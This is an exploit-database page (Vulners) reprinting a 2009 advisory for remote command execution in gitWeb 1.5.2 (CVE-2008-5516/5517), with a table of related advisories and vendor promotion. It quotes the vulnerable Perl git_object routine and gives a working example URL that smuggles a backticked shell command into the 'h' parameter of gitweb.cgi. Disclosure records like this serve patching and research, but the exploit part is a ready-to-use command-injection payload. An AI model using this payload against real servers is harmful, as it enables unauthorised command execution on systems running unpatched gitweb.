Vulners
Lucene search
gitWeb v1.5.2 Remote Command Execution
| Reporter | Title | Published | Views | Family All 51 |
|---|---|---|---|---|
 | Vulnerabilities of the Gentoo Linux operating system, which allow a remote attacker to compromise the confidentiality, integrity, and accessibility of protected information | 28 Apr 201500:00 | – | bdu_fstec |
 | CVE-2008-5516 | 20 Jan 200916:00 | – | cve |
| CVE-2008-5517 | 13 Jan 200916:00 | – | cve |
 | CVE-2008-5516 | 20 Jan 200916:00 | – | cvelist |
| CVE-2008-5517 | 13 Jan 200916:00 | – | cvelist |
 | [SECURITY] [DSA 1708-1] New Git packages fix remote code execution | 19 Jan 200920:53 | – | debian |
 | Debian DSA-1708-1 : git-core - shell command injection | 20 Jan 200900:00 | – | nessus |
| GLSA-200903-15 : git: Multiple vulnerabilities | 10 Mar 200900:00 | – | nessus |
| GIT gitweb git_snapshot / git_object Shell Metacharacter Arbitrary Command Execution | 21 Feb 201000:00 | – | nessus |
| GIT gitweb git_search Shell Metacharacter Arbitrary Command Execution | 8 Apr 201100:00 | – | nessus |
10
======================================
gitWeb v1.5.2 Remote Command Execution
======================================
# Exploit Title: gitWeb remote command execution
# Date: 2009.06.19
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: GIT 1.5.2
# Tested on: debian linux, GIT 1.5.2
# CVE: CVE-2008-5516 - CVE-2008-5517
# Code:
# The cgi script doesn't show the command output *blind command execution ;)*
# Vulnerable functions in gitweb.cgi: git_snapshot(), git_search(), git_object()
sub git_object {
# object is defined by:
# - hash or hash_base alone
# - hash_base and file_name
my $type;
# - hash or hash_base alone
if ($hash || ($hash_base && !defined $file_name)) {
my $object_id = $hash || $hash_base;
my $git_command = git_cmd_str();
open my $fd, "-|", "$git_command cat-file -t $object_id 2>/dev/null"
or die_error('404 Not Found', "Object does not exist");
$type = <$fd>;
chomp $type;
close $fd
or die_error('404 Not Found', "Object does not exist");
# - hash_base and file_name
# Example
http://server/cgi-bin/gitweb.cgi?p=sample.git/.git;a=object;f=program.c;h=e69de29bb2d1d6434b8b29ae775ad8c2e48c5391|`touch$IFS/tmp/file.txt`|;hb=9adaf5b35bb6415497d23f089660567227ea3785
# 0day.today [2018-01-03] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Feb 2010 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.07517